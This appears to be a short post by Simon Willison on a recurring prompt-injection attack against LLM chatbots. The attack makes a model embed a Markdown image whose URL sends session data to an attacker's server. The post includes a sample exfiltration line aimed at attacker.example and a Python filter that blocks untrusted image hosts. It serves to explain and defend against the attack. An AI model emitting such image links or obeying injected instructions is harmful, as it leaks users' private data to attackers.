Simon Willison on Nostr:
The 6th example I've seen of the same prompt injection attack against LLM chatbots: https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/
The attack involves tricking an LLM chatbot that has access to both private and untrusted data into embedding a Markdown image with a URL that points to an attacker's server and leaks private data extracted from the session.
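To make the mechanics concrete: the injected instructions get the model to output something like `![](https://attacker.example/log?q=...)`, and when the chat UI renders that Markdown the user's browser fetches the URL, carrying the data along with it. One common shape of mitigation is to refuse to render images from arbitrary external domains. Here's a minimal Python sketch of such a filter; the function name, allowlist, domains and payload are all made up for illustration:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: only render images hosted on domains the
# chat product controls. (These domain names are made up.)
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches Markdown image syntax: ![alt](url)
MARKDOWN_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Drop Markdown images whose URL points at a non-allowlisted host.

    Rendering an image makes the browser issue an HTTP GET for its
    URL, so an attacker-controlled URL exfiltrates whatever the model
    was tricked into embedding in the query string.
    """
    def replace(match: re.Match) -> str:
        url = match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image
        return f"[image blocked: {url}]"  # untrusted: render as text

    return MARKDOWN_IMAGE.sub(replace, markdown)

# The kind of output an injected instruction produces: the "image"
# smuggles session data out in its query string.
model_output = (
    "Here is your summary.\n"
    "![](https://attacker.example/log?q=PRIVATE_DATA_FROM_SESSION)"
)
print(strip_untrusted_images(model_output))
# The attacker's image is replaced with "[image blocked: ...]",
# so no request ever reaches attacker.example.
```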
We've now seen this same attack in ChatGPT itself, Google Bard, Writer.com, Amazon Q and Google NotebookLM (all now fixed, thankfully).
My collection: https://simonwillison.net/tags/markdownexfiltration/